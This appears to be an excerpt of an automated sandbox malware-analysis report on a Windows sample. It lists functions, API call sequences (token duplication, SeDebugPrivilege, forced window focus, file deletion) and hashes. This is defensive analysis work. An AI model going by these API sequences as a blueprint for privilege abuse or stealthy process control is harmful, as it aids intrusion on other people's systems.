                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: PF$'|G$*"D$*vG$+%F$0wE$2G$5CG$7eF$<HF$<G$ApG$DvE$GSG$IqE$K@G$LbF$MdF$NgF$PIF$YtG$^[F$_?G$b"D$i}G$j)F$kQG$lE$rTG$vjE$}eE$*F$3G$_G$wG
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 0-3772701627
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b1e67458769bbea4a86cd8903524db5b6e79558e2e7ab8c51025fc7bd56032a7
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 118366F1905B409FC351DFAAF984605BAE1F3AA3157A2857FC5088B731D7B8194A8F4C
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004375B0 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 126threadkeyboardwindowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32(00000000,?,?,004448AF,?), ref: 004375B3
                                                                                                                                                                                                                                                                                                                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004375D8
                                                                                                                                                                                                                                                                                                                                                                                                                • IsIconic.USER32(?), ref: 004375E1
                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000009,?,?,004448AF,?), ref: 004375EE
                                                                                                                                                                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 004375FD
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00437615
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00437619
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00437624
                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437632
                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437638
                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 0043763E
                                                                                                                                                                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 00437645
                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437654
                                                                                                                                                                                                                                                                                                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 0043765D
                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043766B
                                                                                                                                                                                                                                                                                                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00437674
                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437682
                                                                                                                                                                                                                                                                                                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 0043768B
                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437699
                                                                                                                                                                                                                                                                                                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 004376A2
                                                                                                                                                                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 004376AD
                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376CD
                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D3
                                                                                                                                                                                                                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D9
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3778422247-2988720461
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 6108fbe056c1a000d5481f33e03d330ccc862392245923d3170deea12ea07584
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC31A4712803157FE6245BA59D0EF7F3F9CEB48B51F10082EFA02EA1D1DAE458009B79
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004461ED Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 227processCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • _memset.LIBCMT ref: 0044621B
                                                                                                                                                                                                                                                                                                                                                                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 00446277
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0044628A
                                                                                                                                                                                                                                                                                                                                                                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004462A4
                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcessWindowStation.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462BD
                                                                                                                                                                                                                                                                                                                                                                                                                • SetProcessWindowStation.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462C8
                                                                                                                                                                                                                                                                                                                                                                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004462E4
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0044639E
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 004463C7
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadUserProfileW.USERENV(?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 004463E7
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateEnvironmentBlock.USERENV(?,?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00446408
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,?,?,00000000,?), ref: 00446446
                                                                                                                                                                                                                                                                                                                                                                                                                • UnloadUserProfile.USERENV(?,?,?,?,?,?,?), ref: 00446483
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseWindowStation.USER32(00000000,?,?,?,?), ref: 00446497
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseDesktop.USER32(00000000,?,?,?,?), ref: 0044649E
                                                                                                                                                                                                                                                                                                                                                                                                                • SetProcessWindowStation.USER32(?,?,?,?,?), ref: 004464A9
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?), ref: 004464B4
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyEnvironmentBlock.USERENV(?,?,?,?,?,?), ref: 004464C8
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: $default$winsta0
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2173856841-1027155976
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 60466c812311f25fb86c91292e7101a774af41f6c0f7563e11afd4658bd94aff
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: eafd5d154f9bcf2590b8f8eb1e0f3d39b01f77f2fd200ee1cb9c7344d9c52646
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 60466c812311f25fb86c91292e7101a774af41f6c0f7563e11afd4658bd94aff
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD819170208341AFE724DF65C848B6FBBE8AF89744F04491DF69097291DBB8D805CB6B
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044BD29 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\AENiBH7X1q.exe,?,C:\Users\user\Desktop\AENiBH7X1q.exe,004A8E80,C:\Users\user\Desktop\AENiBH7X1q.exe,0040F3D2), ref: 0040FFCA
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A45
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A6C
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436A1D: __wcsicoll.LIBCMT ref: 00436A93
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0044BD96
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0044BDBF
                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 0044BDEC
                                                                                                                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0044BE04
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 0044BE73
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0044BE85
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0044BE97
                                                                                                                                                                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC3
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 0044BED5
                                                                                                                                                                                                                                                                                                                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 0044BEF5
                                                                                                                                                                                                                                                                                                                                                                                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0C
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 0044BF17
                                                                                                                                                                                                                                                                                                                                                                                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2E
                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0044BF35
                                                                                                                                                                                                                                                                                                                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 0044BF51
                                                                                                                                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF66
                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0044BF7E
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: \*.*
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2188072990-1173974218
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 14f7055b3521afb04026f42b490306401b0ba37f80ed0ea0ca267746d8cc4687
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA5166B2008344AAD720DBA4DC44FDF73E8AB85314F448D1EF68982141EB79D64CCBAA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00434D50 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 114fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00434D75
                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00434D91
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00434D9B
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00434DB0
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00434DC5
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00434DD7
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00434E0A
                                                                                                                                                                                                                                                                                                                                                                                                                • _memset.LIBCMT ref: 00434E27
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00434E3C
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 00434E6F
                                                                                                                                                                                                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00434EA9
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00434EB4
                                                                                                                                                                                                                                                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 00434EBB
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00434ECE
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcslen$CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: :$\$\??\%s
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 302090198-3457252023
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 730b2dca1b6b09bd6b76555d3316dee95f4818bcffb97f26f8f03165767cfd2f
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30416676604340ABE330EB64DC49FEF73E8AFD8714F00891EF649921D1E7B4A645876A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00464422 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 193threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00444233: _wcslen.LIBCMT ref: 0044424E
                                                                                                                                                                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046449E
                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 004644B4
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 004644C8
                                                                                                                                                                                                                                                                                                                                                                                                                • OpenThreadToken.ADVAPI32(00000000), ref: 004644CF
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 004644E0
                                                                                                                                                                                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004644E7
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: OpenProcess$CurrentThreadToken$ErrorLast_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1312810259-2896544425
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c3f5e6af55eb0da9fa74db60d4f5a84adac3a89a74612fbe59a223ef38337450
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E51A171200201AFD710DF65DD85F5BB7A8AB84704F10892EFB44DB2C1D7B8E844CBAA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004037E0 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 359COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403871
                                                                                                                                                                                                                                                                                                                                                                                                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403887
                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 004038B2
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 004038C7
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 004038DC
                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 004038EC
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,0040397D,?,?,00000010), ref: 00403F54
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,00000010), ref: 00403F8B
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 004039C2
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00403A53
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00403AAA
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                • _, xrefs: 00403B48
                                                                                                                                                                                                                                                                                                                                                                                                                • #include depth exceeded. Make sure there are no recursive includes, xrefs: 0042B87B
                                                                                                                                                                                                                                                                                                                                                                                                                • Unterminated string, xrefs: 0042B9BA
                                                                                                                                                                                                                                                                                                                                                                                                                • Error opening the file, xrefs: 0042B8AC
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpy$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_wcscatstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4115725249-188983378
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3d47019ae40ddf295a6fa6cd32c8ae21ab53d4334480ddcc4f0e34d1fe96fec4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: dca64db042171ec5605b2d10b6a92a42a2076cc25022adee7b8115af8a15fc96
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d47019ae40ddf295a6fa6cd32c8ae21ab53d4334480ddcc4f0e34d1fe96fec4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16D1D5B15083019AD710EF65C841AEB77E8AF95308F04492FF5C563292DB78DA49C7AB
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00434BEE Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00434C12
